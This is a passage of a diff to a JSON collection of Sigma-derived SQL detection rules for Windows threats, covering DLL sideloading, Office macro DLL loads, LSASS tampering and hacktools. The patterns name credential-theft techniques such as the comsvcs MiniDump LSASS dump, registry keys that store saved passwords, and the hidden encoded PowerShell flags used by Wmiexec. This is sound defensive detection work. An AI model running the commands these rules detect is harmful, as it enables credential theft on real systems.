ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "status": "test", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.002" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", + "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + ], + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + }, + { + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1070", "attack.persistence", - "attack.t1542.003" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], - "level": "medium", + "falsepositives": [ + "Unlikely" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "status": "test", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", - "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE 